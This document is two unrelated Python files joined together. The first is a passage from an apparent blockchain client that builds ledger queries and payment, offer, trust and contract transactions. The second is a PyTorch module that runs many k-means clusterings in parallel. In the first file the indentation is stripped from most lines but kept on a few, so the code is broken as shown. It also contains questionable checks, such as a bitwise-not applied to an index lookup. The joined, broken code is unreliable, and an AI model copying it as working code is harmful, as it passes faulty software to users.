        self.server.set_state('online' if online else 'offline')
def handle_response(self, data):
"""
handle response by every websocket request
:param data:
:return:
"""
        req_id = data.get('id')
        if not isinstance(req_id, Number) or req_id not in self.requests:
            return
        request = self.requests[req_id]
        # skip processing when there is no pending request
        del self.requests[req_id]
        del data['id']
        # check if data contain server info
        if data.get('result') and data.get('status') == 'success' \
                and data['result'].get('server_status'):
            self.update_server_status(data['result'])
        # return to callback
        if data.get('status') == 'success':
            # 'filter' may be absent because submit() does not store one
            result = request['filter'](data['result']) if request.get('filter') else data['result']
            request['callback'](None, result)
        elif data.get('status') == 'error':
            request['callback'](data.get('error_message') or data.get('error_exception'))
def handle_transaction(self, data):
"""
handle transaction type response
TODO supply more friendly transaction data
:param data:
:return:
"""
        tx = data['transaction']['hash']
if self.cache.get(tx):
return
self.cache.set(tx, 1)
self.emitter.emit('transactions', data)
def handle_path_find(self, data):
"""
emit path find date to other
:param data:
:return:
"""
self.emitter.emit('path_find', data)
def submit(self, command, data):
"""
request to server and backend
:param command:
:param data:
:param filter:
:return: {'req_id': req_id, 'callback': callback}
"""
result = self.server.send_message(command, data)
self.requests[result['req_id']] = {
'command': command,
'data': data,
# 'filter': filter,
'callback': result['callback']
}
return result
# return result['callback']
def subscribe(self, streams):
request = Request(self, "subscribe", None)
if streams:
request.message['streams'] = streams if isinstance(streams, list) else [streams]
return request
# ---------------------- info request - -------------------
def request_server_info(self):
"""
        request low-level server info
return version, ledger, state and node id
no option is required
:return: {Request}
"""
return Request(self, 'server_info', None)
def request_ledger_closed(self):
"""
        request the latest closed ledger index and hash
:return: {Request}
"""
return Request(self, 'ledger_closed', None)
def request_ledger(self, options):
"""
        get detailed information for a specific ledger
:param options: dict{ledger_index: Number, ledger_hash: hash, string}
:return:
"""
cmd = 'ledger'
filter = True
req = Request(self, cmd, filter)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
if options.__contains__('ledger_index') and is_number(options['ledger_index']):
req.message['ledger_index'] = int(options['ledger_index'])
elif options.__contains__('ledger_hash') and is_valid_hash(options['ledger_hash']):
req.message['ledger_hash'] = options['ledger_hash']
if 'full' in options.keys() and isinstance(options['full'], bool):
req.message['full'] = options['full']
filter = False
if 'expand' in options.keys() and isinstance(options['expand'], bool):
req.message['expand'] = options['expand']
filter = False
if 'transactions' in options.keys() and isinstance(options['transactions'], bool):
req.message['transactions'] = options['transactions']
filter = False
if 'accounts' in options.keys() and isinstance(options['accounts'], bool):
req.message['accounts'] = options['accounts']
filter = False
return req
def request_tx(self, options):
"""
        query the details of a specific transaction
:param options:
:return:
"""
req = Request(self, 'tx', None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
if not is_valid_hash(options['hash']):
req.message['hash'] = Exception('invalid tx hash')
return req
req.message['transaction'] = options['hash']
return req
def get_relation_type(self, type):
if type == 'trustline':
return 0
elif type == 'authorize':
return 1
elif type == 'freeze':
return 2
def request_account(self, type, options, req):
"""
:param type:
:param options:
:param req:
:return:
"""
req.command = type
ledger = None
peer = None
limit = None
marker = None
account = options['account']
if 'ledger' in options:
ledger = options['ledger']
if 'peer' in options:
peer = options['peer']
if 'limit' in options:
limit = options['limit']
if 'marker' in options:
marker = options['marker']
if 'type' in options:
req.message['relation_type'] = self.get_relation_type(options['type'])
if account:
if not Wallet.is_valid_address(account):
req.message['account'] = Exception('invalid account')
return req
else:
req.message['account'] = account
req.select_ledger(ledger)
if Wallet.is_valid_address(peer):
req.message['peer'] = peer
if limit:
limit = int(limit)
if limit < 0:
limit = 0
if limit > 1e9:
limit = 1e9
req.message['limit'] = limit
if marker:
req.message['marker'] = marker
return req
def request_account_info(self, options):
"""
        request account information
:param options: {account:’xxx’}
:return:
"""
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
return self.request_account('account_info', options, req)
def request_account_tums(self, options):
"""
        account tums: request the currencies the account can trade
return account supports currency, including
send currency and receive currency
:param options: account(required): the query account
:return:
"""
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
return self.request_account('account_currencies', options, req)
# import RelationTypes src.transaction
def request_account_relations(self, options):
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
if not ~RelationTypes.index(options['type']):
req.message['relation_type'] = Exception('invalid realtion type')
return req
if options['type'] == 'trust':
return self.request_account('account_lines', options, req)
elif options['type'] == 'authorize' or options['type'] == 'freeze':
return self.request_account('account_relation', options, req)
req.message['msg'] = Exception('relation should not go here')
return req
def request_account_offers(self, options):
"""
        query the account's open offers
:param options: account(required): the query account
:return:
"""
req = Request(self, None, None)
if not isinstance(options, dict):
req.message['type'] = Exception('invalid options type')
return req
return self.request_account('account_offers', options, req)
def deploy_contract_tx(self, options):
"""
        build a contract deployment transaction
* @param options
* account, required
* amount, required
* payload, required
* @returns {Transaction}
"""
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
account = options['account']
amount = options['amount']
payload = options['payload']
if options.__contains__('params'):
params = options['params']
if not Wallet.is_valid_address(account):
tx.tx_json['account'] = Exception('invalid account')
return tx
if math.isnan(amount):
tx.tx_json['amount'] = Exception('invalid amount')
return tx
if not isinstance(payload, str):
tx.tx_json['payload'] = Exception('invalid payload: type error.')
return tx
if 'params' in vars():
if not isinstance(params, list):
tx.tx_json['params'] = Exception('invalid params')
return tx
tx.tx_json['TransactionType'] = 'ConfigContract'
tx.tx_json['Account'] = account
tx.tx_json['Amount'] = amount * 1000000
tx.tx_json['Method'] = 0
tx.tx_json['Payload'] = payload
tx.tx_json['Args'] = []
if 'params' in vars():
for i in params:
obj = dict()
obj['Arg'] = {'Parameter': str_to_hex(i)}
tx.tx_json['Args'].append(obj)
# print(tx.tx_json['Args'])
return tx
def call_contract_tx(self, options):
"""
        build a contract invocation transaction
* @param options
* account, required
* destination, required
* foo, required
* @returns {Transaction}
"""
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
account = options['account']
des = options['destination']
foo = options['foo']
if options.__contains__('params'):
params = options['params']
if not Wallet.is_valid_address(account):
tx.tx_json['account'] = Exception('invalid account')
return tx
if not Wallet.is_valid_address(des):
tx.tx_json['des'] = Exception('invalid destination')
return tx
if not isinstance(foo, str):
tx.tx_json['foo'] = Exception('foo must be string')
return tx
if 'params' in vars():
if not isinstance(params, list):
tx.tx_json['params'] = Exception('invalid params')
return tx
tx.tx_json['TransactionType'] = 'ConfigContract'
tx.tx_json['Account'] = account
tx.tx_json['Method'] = 1
tx.tx_json['Destination'] = des
tx.tx_json['ContractMethod'] = str_to_hex(foo)
tx.tx_json['Args'] = []
for i in params:
if not isinstance(i, str):
tx.tx_json['params'] = Exception('params must be string')
return tx
obj = dict()
obj['Arg'] = {'Parameter': str_to_hex(i)}
tx.tx_json['Args'].append(obj)
return tx
def parse_payment(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return {
'engine_result': data['result']['engine_result'],
'engine_result_code': data['result']['engine_result_code'],
'engine_result_message': data['result']['engine_result_message'],
'tx_blob': data['result']['tx_blob'],
'tx_json': data['result']['tx_json']
}
else:
return data
else:
return data
def parse_contract(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return {
'ContractState:': data['result']['ContractState'],
'engine_result': data['result']['engine_result'],
'engine_result_code': data['result']['engine_result_code'],
'engine_result_message': data['result']['engine_result_message'],
'tx_blob': data['result']['tx_blob'],
'tx_json': data['result']['tx_json']
}
else:
return data
else:
return data
def parse_transaction(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
else:
return data
data = json.loads(data)
if data['status'] == 'success':
return data['result']
else:
return {
'error': data['error'],
'msg': data['error_message']
}
@staticmethod
def parse_ledger(data, req):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
if data['status'] == 'success':
if data['result'].__contains__('ledger'):
ledger = data['result']['ledger']
else:
ledger = data['result']['closed']['ledger']
if req.message.__contains__('transactions') and req.message['transactions']:
return ledger
else:
return {
'accepted': ledger['accepted'],
'ledger_hash': ledger['hash'],
'ledger_index': ledger['ledger_index'],
'parent_hash': ledger['parent_hash'],
'close_time': ledger['close_time_human'],
'total_coins': ledger['total_coins']
}
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
def parse_ledger_closed(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
return {
'ledger_hash': data['result']['ledger_hash'],
'ledger_index': data['result']['ledger_index']
}
else:
return data
def parse_server_info(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
return {
'version': data['result']['info']['build_version'],
'ledgers': data['result']['info']['complete_ledgers'],
'node': data['result']['info']['pubkey_node'],
'state': data['result']['info']['server_state']
}
else:
return data
@staticmethod
def parse_account_tx_info(data, req):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
data = data['result']
results = []
for tx in data['transactions']:
_tx = process_tx(tx, req.message['account'])
results.append(_tx)
data['transactions'] = results
return data
else:
return data
# if data['status'] == 'success':
# return {
# 'account': data['result']['account'],
# 'ledger_index_max': data['result']['ledger_index_max'],
# 'ledger_index_min': data['result']['ledger_index_min']
# }
# else:
# return {
# 'error': data['error']
# }
# else:
# return data
def parse_orderbook_info(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
return {
'ledger_current_index': data['result']['ledger_current_index'],
'offers': data['result']['offers']
}
else:
return {
'error': data['error']
}
else:
return data
def parse_account_info(self, data):
if isinstance(data, dict) and data['callback']:
data = json.loads(data['callback'])
if data['status'] == 'success':
account_data = {
'account_data': data['result']['account_data'],
'ledger_index': data['result']['ledger_index'],
'ledger_hash': data['result']['ledger_hash']
}
return account_data
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
def parse_account_tums(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
return {
'ledger_index': data['result']['ledger_index'],
'ledger_hash': data['result']['ledger_hash'],
'receive_currencies': data['result']['receive_currencies'],
'send_currencies': data['result']['send_currencies'],
'validated': data['result']['validated']
}
else:
return data
def parse_request_account_relations(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
data = json.loads(data)
if data['status'] == 'success':
return {
'account': data['result']['account'],
'ledger_hash': data['result']['ledger_hash'],
'ledger_index': data['result']['ledger_index'],
'lines': data['result']['lines'],
'validated': data['result']['validated']
}
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
def parse_request_account_offers(self, data):
if isinstance(data, dict) and data['callback']:
data = data['callback']
if not isinstance(data, dict):
data = json.loads(data)
if data['status'] == 'success':
return {
'account': data['result']['account'],
'ledger_hash': data['result']['ledger_hash'],
'ledger_index': data['result']['ledger_index'],
'offers': data['result']['offers']
}
else:
return {
'error': data['error'],
'msg': data['error_message']
}
else:
return data
"""
* payment
* @param options
* source|from|account source account, required
* destination|to destination account, required
* amount payment amount, required
* @returns {transaction}
    * build a payment transaction
"""
def build_payment_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
if options.__contains__('destination'):
dst = options['destination']
elif options.__contains__('to'):
dst = options['to']
amount = options['amount']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not Wallet.is_valid_address(dst):
tx.tx_json['dst'] = Exception('invalid destination address')
return tx
if not utils.is_valid_amount(amount):
tx.tx_json['amount'] = Exception('invalid amount')
return tx
tx.tx_json['TransactionType'] = 'Payment'
tx.tx_json['Account'] = src
tx.tx_json['Amount'] = to_amount(amount)
tx.tx_json['Destination'] = dst
return tx
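    # Illustrative call (comments only; addresses, value and currency are hypothetical placeholders):
    #   tx = remote.build_payment_tx({
    #       'account': 'j...source-address...',
    #       'to': 'j...destination-address...',
    #       'amount': {'value': '1', 'currency': 'SWT', 'issuer': ''}
    #   })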
    # set account properties (AccountSet)
def build_account_set_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = ValueError('invalid options type')
return tx
if not options['type'] in AccountSetTypes:
tx.tx_json['type'] = ValueError('invalid account set type')
return tx
if options['type'] == 'property':
return self.__build_account_set(options, tx)
elif options['type'] == 'delegate':
return self.__build_delegate_key_set(options, tx)
elif options['type'] == 'signer':
return self.__build_signer_set() # not implement yet
tx.tx_json['msg'] = Warning('build account set should not go here')
return tx
def __build_account_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
        if options.__contains__('set_flag'):
            set_flag = options['set_flag']
        elif options.__contains__('set'):
            set_flag = options['set']
        else:
            set_flag = None
if options.__contains__('clear_flag'):
clear_flag = options['clear_flag']
elif options.__contains__('clear'):
clear_flag = options['clear']
else:
clear_flag = None
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
tx.tx_json['TransactionType'] = 'AccountSet'
tx.tx_json['Account'] = src
SetClearFlags = set_clear_flags['AccountSet']
if set_flag:
set_flag = self.__prepare_flag(set_flag, SetClearFlags)
if set_flag:
tx.tx_json['SetFlag'] = set_flag
if clear_flag is not None:
clear_flag = self.__prepare_flag(clear_flag, SetClearFlags)
if clear_flag:
tx.tx_json['ClearFlag'] = clear_flag
return tx
def __prepare_flag(self, flag, SetClearFlags):
result = None
if isinstance(flag, (int, float)):
result = flag
else:
if flag in SetClearFlags:
result = SetClearFlags[flag]
else:
key = 'asf' + flag
if key in SetClearFlags:
result = SetClearFlags[key]
return result
def __build_delegate_key_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
delegate_key = options['delegate_key']
if not Wallet.is_valid_address(src):
tx.tx_json['delegate_key'] = Exception('invalid source address')
return tx
if not Wallet.is_valid_address(delegate_key):
tx.tx_json['delegate_key'] = Exception('invalid regular key address')
return tx
tx.tx_json['TransactionType'] = 'SetRegularKey'
tx.tx_json['Account'] = src
tx.tx_json['RegularKey'] = delegate_key
return tx
def __build_signer_set(self):
return None
    # create an offer (OfferCreate)
def build_offer_create_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = TypeError('invalid options type')
return tx
offer_type = options['type']
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
if options.__contains__('taker_gets'):
taker_gets = options['taker_gets']
elif options.__contains__('pays'):
taker_gets = options['pays']
if options.__contains__('taker_pays'):
taker_pays = options['taker_pays']
elif options.__contains__('gets'):
taker_pays = options['gets']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not isinstance(offer_type, str) or not offer_type in OfferTypes:
tx.tx_json['offer_type'] = TypeError('invalid offer type')
return tx
if isinstance(taker_gets, str) and not int(taker_gets) and not float(taker_gets):
tx.tx_json['taker_gets2'] = Exception('invalid to pays amount')
return tx
if not taker_gets and not utils.is_valid_amount(taker_gets):
tx.tx_json['taker_gets2'] = Exception('invalid to pays amount object')
return tx
        if isinstance(taker_pays, str) and not int(taker_pays) and not float(taker_pays):
tx.tx_json['taker_pays2'] = Exception('invalid to gets amount')
return tx
if not taker_pays and not utils.is_valid_amount(taker_pays):
tx.tx_json['taker_pays2'] = Exception('invalid to gets amount object')
return tx
tx.tx_json['TransactionType'] = 'OfferCreate'
        if offer_type == 'Sell':
tx.set_flags(offer_type)
tx.tx_json['Account'] = src
tx.tx_json['TakerPays'] = to_amount(taker_pays)
tx.tx_json['TakerGets'] = to_amount(taker_gets)
return tx
    # cancel an offer (OfferCancel)
def build_offer_cancel_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json.obj = Exception('invalid options type')
return tx
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
sequence = options['sequence']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not int(sequence) and not float(sequence):
tx.tx_json['sequence'] = Exception('invalid sequence param')
return tx
tx.tx_json['TransactionType'] = 'OfferCancel'
tx.tx_json['Account'] = src
tx.tx_json['OfferSequence'] = int(sequence)
return tx
def __build_relation_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
des = options['target']
limit = options['limit']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not Wallet.is_valid_address(des):
tx.tx_json['des'] = Exception('invalid target address')
return tx
if not utils.is_valid_amount(limit):
tx.tx_json['limit'] = Exception('invalid amount')
return tx
if options['type'] == 'unfreeze':
tx.tx_json['TransactionType'] = 'RelationDel'
else:
tx.tx_json['TransactionType'] = 'RelationSet'
tx.tx_json['Account'] = src
tx.tx_json['Target'] = des
if options['type'] == 'authorize':
tx.tx_json['RelationType'] = 1
else:
tx.tx_json['RelationType'] = 3
if limit:
tx.tx_json['LimitAmount'] = limit
return tx
def __build_trust_set(self, options, tx):
if options.__contains__('source'):
src = options['source']
elif options.__contains__('from'):
src = options['from']
elif options.__contains__('account'):
src = options['account']
limit = options['limit']
if options.__contains__('quality_out'):
tx.tx_json['QualityIn'] = options['quality_out']
if options.__contains__('quality_in'):
tx.tx_json['QualityOut'] = options['quality_in']
if not Wallet.is_valid_address(src):
tx.tx_json['src'] = Exception('invalid source address')
return tx
if not utils.is_valid_amount(limit):
tx.tx_json['limit'] = Exception('invalid amount')
return tx
tx.tx_json['TransactionType'] = 'TrustSet'
tx.tx_json['Account'] = src
if limit:
tx.tx_json['LimitAmount'] = limit
return tx
"""
* add wallet relation set
* @param options
* type: Transaction.RelationTypes
* source|from|account source account, required
* limit limt amount, required
* quality_out, optional
* quality_in, optional
* @returns {Transaction}
* 创建关系对象
"""
def build_relation_tx(self, options):
tx = Transaction(self, None)
if not options:
tx.tx_json['obj'] = Exception('invalid options type')
return tx
if not options['type'] in RelationTypes:
tx.tx_json['type'] = Exception('invalid relation type')
return tx
if options['type'] == 'trust':
return self.__build_trust_set(options, tx)
elif options['type'] == 'authorize' or \
options['type'] == 'freeze' or options['type'] == 'unfreeze':
return self.__build_relation_set(options, tx)
tx.tx_json['msg'] = Exception('build relation set should not go here')
return tx
# 获得账号交易列表
def request_account_tx(self, options):
data = []
request = Request(self, 'account_tx', None)
        if not isinstance(options, dict):
request.message['type'] = Exception('invalid options type')
return request
if not Wallet.is_valid_address(options['account']):
request.message['account'] = Exception('account parameter is invalid')
return request
request.message['account'] = options['account']
if options.__contains__('ledger_min') and Number(options['ledger_min']):
request.message['ledger_index_min'] = Number(options['ledger_min'])
else:
request.message['ledger_index_min'] = 0
if options.__contains__('ledger_max') and Number(options['ledger_max']):
request.message['ledger_index_max'] = Number(options['ledger_max'])
else:
request.message['ledger_index_max'] = -1
if options.__contains__('limit') and isinstance(options['limit'], int):
if options['limit'] > 0: # limit must be positive
request.message['limit'] = options['limit']
if options.__contains__('offset') and Number(options['offset']):
request.message['offset'] = Number(options['offset'])
        if options.__contains__('marker') and isinstance(options['marker'], dict) and Number(
                options['marker']['ledger']) is not None and Number(
                options['marker']['seq']) is not None:
request.message['marker'] = options['marker']
        if options.__contains__('forward') and isinstance(options['forward'], bool):
request.message['forward'] = options['forward']
return request
# 获得市场挂单列表
def request_order_book(self, options):
request = Request(self, 'book_offers', None)
        if not isinstance(options, dict):
request.message['type'] = Exception('invalid options type')
return request
# taker_gets = options['taker_gets'] or options['pays']
if options.__contains__('taker_gets'):
taker_gets = options['taker_gets']
elif options.__contains__('pays'):
taker_gets = options['pays']
if not utils.is_valid_amount0(taker_gets):
request.message['taker_gets'] = Exception('invalid taker gets amount')
return request
# taker_pays = options['taker_pays'] or options['gets']
if options.__contains__('taker_pays'):
taker_pays = options['taker_pays']
elif options.__contains__('gets'):
taker_pays = options['gets']
if not utils.is_valid_amount0(taker_pays):
request.message['taker_pays'] = Exception('invalid taker pays amount')
return request
if options.__contains__('limit'):
if isinstance(options['limit'], int):
options['limit'] = int(options['limit'])
request.message['taker_gets'] = taker_gets
request.message['taker_pays'] = taker_pays
if options.__contains__('taker'):
request.message['taker'] = options['taker']
else:
request.message['taker'] = Config.ACCOUNT_ONE
# request.message['taker'] = options['taker'] if options['taker'] else utils['ACCOUNT_ONE']
if options.__contains__('limit'):
request.message['limit'] = options['limit']
return request
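# Illustrative usage sketch (hedged): this file does not show how a Remote instance is
# constructed, so `remote` below is assumed to be an already initialized instance of this
# class, and the addresses are placeholders only.
#
#   remote = ...  # assumed: a connected Remote instance
#   req = remote.request_account_tx({'account': 'jxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'limit': 10})
#   tx = remote.build_offer_cancel_tx({'account': 'jxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'sequence': 7})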
|
the-stack_106_15866
|
import torch
import torch.nn as nn
import numpy as np
import math
from time import time
from .kernels import MaxSimCUDA
from .kernels import ComputeCentroidsCUDA
from ..CustomModule import CustomModule
class MultiKMeans(CustomModule):
"""
Run multiple independent K-means algorithms in parallel.
Parameters:
n_clusters: int,
Number of clusters
max_iter: int, default: 100
Maximum number of iterations
tol: float, default: 0.0001
Tolerance
n_redo: int, default: 1
            Number of times k-means will be run with differently initialized centroids.
            The centroids with the lowest inertia will be selected as the final result.
init_mode: {'random', 'kmeans++'}, default: 'random'
Initialization method
'random': randomly chose initial centroids from input data
            'kmeans++': use k-means++ algorithm to initialize centroids (slow when n_clusters is large, but converges faster)
verbose: int, default: 0
Verbosity
distance: {'euclidean', 'cosine', 'manhattan'}, default: 'euclidean'
Type of distance metric
note: manhattan or L1 distance is only supported on GPU
Attributes:
        centroids: torch.Tensor, shape: [l, d_vector, n_clusters]
cluster centroids
"""
def __init__(
self,
n_clusters,
n_redo=1,
max_iter=100,
tol=1e-4,
distance="euclidean",
init_mode="random",
verbose=0,
sm_size=48*256*4,
):
super(MultiKMeans, self).__init__()
self.n_redo = n_redo
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.verbose = verbose
self.distance = distance
self.init_mode = init_mode
self.sm_size = sm_size
self.arange = None
if n_clusters < 4096:
dk = n_clusters
else:
dk = 4096
de = 1
self.register_buffer("centroids", None)
if torch.cuda.is_available():
self.compute_centroids_cuda = ComputeCentroidsCUDA(
de=de,
dk=dk,
sm_size=sm_size,
)
if distance in ["euclidean", "manhattan"]:
distance = distance
elif distance in ["cosine"]:
distance = "inner"
self.max_sim_cuda = MaxSimCUDA(
distance=distance,
)
@staticmethod
def remaining_memory(device):
"""
Get remaining memory of GPU in bytes
"""
# torch.cuda.synchronize()
if device.type == "cpu":
remaining = 32 * 1024 ** 3 # just a random large number
elif device.type == "cuda":
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
remaining = total_memory - torch.cuda.memory_reserved()
# remaining = total_memory - torch.cuda.memory_allocated()
return remaining
@staticmethod
def does_it_fit(size, device="cpu", dtype=torch.float):
try:
torch.empty(size, device=device, dtype=dtype)
        except Exception:
return False
else:
return True
@staticmethod
def calculate_error(a, b):
"""
Compute L2 error between 'a' and 'b'
"""
diff = a - b
diff.pow_(2)
return diff.sum()
@staticmethod
def calculate_inertia(a):
return (-a).mean()
@staticmethod
def cos_sim(a, b, normalize=True, inplace=False):
"""
Compute batched cosine similarity between 'a' and 'b'
a: torch.Tensor, shape : [n_kmeans, d_vector, m]
b: torch.Tensor, shape : [n_kmeans, d_vector, n]
normalize: bool, default : True
if True, a and b will be normalized to norm=1
inplace: bool, default : False
returns: torch.Tensor, shape : [l, m, n]
"""
if normalize:
a_norm = a.norm(dim=-2, keepdim=True) + 1e-8 #[l, m] <l*(m*4)>
b_norm = b.norm(dim=-2, keepdim=True) + 1e-8 #[l, n] <l*(m*4 + n*4)>
if inplace:
# memory consump: m + n + (m * n)
a.div_(a_norm)
b.div_(b_norm)
else:
# memory consum: m + n + (m * n) + m*d + n*d
a = a / a_norm #[l, d_vector, m], l*(<m*4 + n*4> + <m*d*4>)
b = b / b_norm #[l, d_vector, n], l*(<m*4 + n*4> + <(m+n)*d*4>)
prod = a.transpose(-2, -1) @ b #[l, m, n], <m*n*4 + m*4 + n*4> + <(m+n)*d*4>
if inplace and normalize:
a.mul_(a_norm)
b.mul_(b_norm)
return prod
@staticmethod
def euc_sim(a, b, inplace=False):
"""
Compute batched negative squared euclidean distance between 'a' and 'b'
a: torch.Tensor, shape : [l, d_vector, m]
b: torch.Tensor, shape : [l, d_vector, n]
inplace: bool, default : False
returns: torch.Tensor, shape : [l, m, n]
"""
        # peak mem usage: m*n*4 + max(m,n)*4 + inplace ? 0: (m+n)*d*4
y = a.transpose(-2, -1) @ b # [m, n] <m*n*4>
y.mul_(2)
if inplace:
a.pow_(2)
b.pow_(2)
else:
a = a ** 2 #[m, d], <m*n*4 + m*d*4>
b = b ** 2 #[n, d], <m*n*4 + n*d*4 + m*d*4>
a2 = a.sum(dim=-2)[..., :, None] #? [m], <m*n*4 + m*4> + <n*d*4 + m*d*4>
y.sub_(a2)
del a2
b2 = b.sum(dim=-2)[..., None, :] #[n], <m*n*4 + n*4> + <n*d*4 + m*d*4>
y.sub_(b2)
if inplace:
a.sqrt_()
b.sqrt_()
return y
def sim(self, a, b, inplace=False, normalize=True):
"""
Compute batched similarity between 'a' and 'b', the type of distance metric is specified in __init__ method
a: torch.Tensor, shape : [l, d, m]
b: torch.Tensor, shape : [l, d, n]
returns: torch.Tensor, shape : [l, m, n]
"""
if self.distance == "euclidean":
return self.euc_sim(a, b, inplace=inplace)
elif self.distance == "cosine":
return self.cos_sim(a, b, inplace=inplace, normalize=normalize)
elif self.distance == "inner":
return self.cos_sim(a, b, inplace=inplace, normalize=False)
### Need more testing:
def kmeanspp(self, data):
"""
Initialize centroids with k-means++ algorithm
data: torch.Tensor, shape : [l, d_vector, n_data]
returns: torch.Tensor, shape : [l, d_vector, n_clusters]
"""
l, d_vector, n_data = data.shape
if self.distance == "cosine":
data_norm = data.norm(dim=-2, keepdim=True) + 1e-8
data.div_(data_norm)
centroids = torch.zeros(l, d_vector, self.n_clusters, device=data.device, dtype=data.dtype)
#Select initial centroid
centroids[:, :, 0] = data[:, :, np.random.randint(n_data)]
for i in range(1, self.n_clusters):
current_centroids = centroids[:, :, :i].contiguous()
if data.device.type == "cpu":
sims = self.sim(data, current_centroids ) #[l,m,n]
max_sims_v, max_sims_i = sims.max(dim=-1) #[l,m]
elif data.device.type == "cuda":
max_sims_v, max_sims_i = self.max_sim_cuda(data, current_centroids, dim=2, mode="tn")
index = max_sims_v.argmin(dim=-1) #[l]
            arange = torch.arange(l, device=data.device)
new_centroid = data[arange, :, index] #[l, d_vector]
centroids[:, :, i] = new_centroid
if self.distance == "cosine":
data.mul_(data_norm)
return centroids
def initialize_centroids(self, data):
"""
Initialize centroids with init_method specified in __init__
data: torch.Tensor, shape : [l, d_vector, n_data]
return: torch.Tensor, shape: [l, d_vector, n_clusters]
"""
l, d_vector, n_data = data.shape
if self.init_mode == "random":
random_index = np.random.choice(
n_data,
size=[self.n_clusters],
replace=False
)
centroids = data[:, :, random_index]
if self.verbose >= 1:
print("centroids are randomly initialized.")
elif self.init_mode == "kmeans++":
centroids = self.kmeanspp(data)
if self.verbose >= 1:
print("kmeans++ initialization is done!")
return centroids
def get_labels(self, data, centroids):
"""
data: torch.Tensor, shape : [l, d_vector, n_data]
centroids: torch.Tensor, shape : [l, d_vector, n_clusters]
return: torch.Tensor, shape : [l, n_data], dtype: long
"""
#memory requirement:
l, d, m = data.shape
l, d, n = centroids.shape
remaining = self.remaining_memory(data.device)# - 1024*3
if self.distance == "euclidean":
required = l*(m*n + max(m, n) + m*d + n*d) * data.element_size()
elif self.distance in ["cosine", "inner"]:
required = l*((m*n) + (m+n)*(d+1)) * data.element_size()
if remaining >= required:
sims = self.sim(data, centroids, inplace=False) #[l, m, n]
maxsims, labels = sims.max(dim=-1) #[l, m]
return (maxsims, labels)
else:
if data.device.type == "cuda":
if self.distance == "cosine":
d_norm = data.norm(dim=-2, keepdim=True) + 1e-8
c_norm = centroids.norm(dim=-2, keepdim=True) + 1e-8
data.div_(d_norm)
centroids.div_(c_norm)
maxsims, labels = self.max_sim_cuda(data, centroids, dim=2, mode="tn")
if self.distance == "cosine":
data.mul_(d_norm)
centroids.mul_(c_norm)
elif data.device.type == "cpu":
## doing in seperate chunks
n_partitions = 1
for i in range(16):
sub_m = math.ceil(m / n_partitions)
if self.distance == "euclidean":
required = l*(sub_m*n + max(sub_m, n)) * data.element_size() + m*8 # +sub_m*d*4
elif self.distance in ["cosine", "inner"]:
required = l*(sub_m*n + sub_m+n) * data.element_size() + m*8# +sub_m*d*4
# print("required, remaining, n_p", required / 1024**3, remaining / 1024**3, n_partitions)
if self.does_it_fit(required // 4, device=data.device, dtype=torch.float):
break
n_partitions *= 2
maxsims = torch.zeros(l, m, device=data.device, dtype=torch.float)
labels = torch.zeros(l, m, device=data.device, dtype=torch.long)
for i in range(n_partitions):
start = i*sub_m
if i == n_partitions - 1:
                        end = m
else:
end = (i+1)*sub_m
sub_data = torch.narrow(data, dim=-1, start=start, length=end-start) #[l, d, sub_m]
# sub_data = data[:, start:end] #[l, d, sub_m]
sub_sims = self.sim(sub_data, centroids, inplace=True) #[l, sub_m, n]
del sub_data
sub_maxsims, sub_labels = sub_sims.max(dim=-1) #[l, sub_m]
del sub_sims
labels[:, start:end] = sub_labels
maxsims[:, start:end] = sub_maxsims
